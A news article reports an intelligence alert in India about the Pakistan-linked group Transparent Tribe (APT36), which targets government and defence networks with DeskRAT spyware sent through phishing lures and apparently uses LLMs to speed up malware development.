Pakistan Shifts To AI-Based Cyber War; Hackers Target Defence, Govt Systems With Advanced Spyware DeskRAT
The attackers are using official-looking emails, ZIP archives, and documents that mimic government notices. Image courtesy: AI-generated picture via Sora
A major cyber-espionage campaign by a Pakistan-linked hacker group, Transparent Tribe, has raised serious concerns within India’s security establishment. An intelligence agency’s report has alerted the Union Ministry of Home Affairs (MHA) about this miscreant group, which is reported to be targeting government and military networks using an advanced spyware called DeskRAT.
Instead of using public cloud platforms like Google Drive, the group has refined its tactics this year. Pak-linked Transperant Tribe is learnt to have shifted to private servers, making it harder to detect and block their operations. Moreover, the group is now using artificial intelligence and large language models (LLMs) to quickly develop new malware variants.
This gives them a dangerous edge over traditional cybersecurity systems, a News18 report claimed, citing sources. Transperant Tribe hackers are believed to be exploiting ongoing border tensions in Ladakh. Their aim appears to be intercepting intelligence related to China’s military movements by compromising Indian systems.
How are Transparent Tribe hackers targeting govt systems?
According to officials, the attackers are sending phishing emails, which are masked as government notices, ZIP files, and intelligence briefings. These are often timed with border incidents or security alerts to trick officials into downloading infected attachments.
As per a Firstpost report, once installed, advanced spywared DeskRAT, which is a remote access tool designed for BOSS Linux systems used in government offices, can secretly monitor, extract, and transmit sensitive files without being noticed. An official further revealed that these attacks are faster, stealthier, and more difficult to detect.
Why has DeskRAT caused a major worry?
Experts warn that only automated, real-time threat detection tools would be needed counter such evolving threats. The goal of the campaign is long-term espionage, not immediate disruption. The malware operates quietly, allowing attackers to steal strategic documents and credentials over weeks or months.
Transparent Tribe has previously been linked to attacks involving Crimson RAT malware, often disguised as security briefings. During the April 2025 Pahalgam terror attack, the group allegedly circulated fake government messages to lure officials.
Following the alert, the MHA has instructed all ministries and defence units to increase cyber vigilance and strengthen security protocols, calling the threat a matter of national security.
Pakistan’s expanding cyber-espionage network
Pakistan’s state-backed hacking ecosystem continues to play a critical role in advancing Islamabad’s strategic and intelligence objectives. Among the most prominent groups is APT 36, which we commonly know as Transparent Tribe. It has been actively conducting cyber-espionage operations against India, by targetting defence personnel, diplomatic missions, and vital infrastructure.
The group’s methods are sophisticated and evolving — from malware-laced documents and watering-hole attacks to social engineering via fake recruitment websites designed to lure unsuspecting officials.
Investigations have also revealed links between APT 36 and other advanced persistent threat (APT) groups such as SideCopy and SideWinder. These entities are known to share digital infrastructure, malware toolkits, and operational patterns, indicating a high level of coordination or common command likely orchestrated by Pakistan’s ISI.
